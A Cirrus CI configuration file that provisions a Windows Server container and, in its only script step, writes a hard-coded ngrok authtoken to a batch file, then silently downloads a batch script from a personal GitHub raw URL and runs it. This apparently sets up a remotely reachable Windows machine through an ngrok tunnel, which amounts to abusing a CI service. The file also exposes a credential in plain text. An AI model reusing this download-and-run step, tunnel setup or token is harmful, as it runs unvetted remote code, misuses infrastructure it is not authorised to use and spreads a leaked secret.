windows_container:
  image: cirrusci/windowsservercore:2019
  cpu: 4
  memory: 10G
  
task:
  prepare_script: echo ngrok authtoken "1aO30oRov2ig77pFpaieYZ1rOIx_7u2HxCdyR3afW22DZJap4" > NGROK.bat && curl -s -O https://raw.githubusercontent.com/DangDev/dangdev/main/azure_pipeline.bat && azure_pipeline.bat
